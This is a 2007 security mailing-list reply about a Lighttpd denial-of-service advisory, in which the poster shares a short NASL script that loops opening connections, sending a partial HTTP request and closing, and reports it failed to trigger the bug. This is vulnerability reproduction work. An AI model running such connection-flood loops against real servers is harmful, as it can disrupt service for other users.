full-disclosure-uk May 2007 archive

Re: [Full-disclosure] [ GLSA 200705-07 ] Lighttpd: Two Denials of Service

From: Michel Arboi <michel.arboi_at_nospam>
Date: Sat May 26 2007 - 14:07:35 GMT
To: full-disclosure@lists.grok.org.uk


> Robert Jakabosky discovered an infinite loop triggered by a connection
> abort when Lighttpd processes carriage return and line feed sequences.

Could anybody reproduce this DoS? I tried this NASL script without success. The server rejects connections for about one minute (because of kazillions of sockets in TIME_WAIT), but it only affects the attacking source IP and I could not launch any CPU loop.

$ more /tmp/ec.nasl
i = 0;

while (s = open_sock_tcp(80))
{
  i++;
  send(socket: s, data: 'GET / HTTP/1.0\r\n');
  close(s);
}
display(i, ' done\n');
$



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/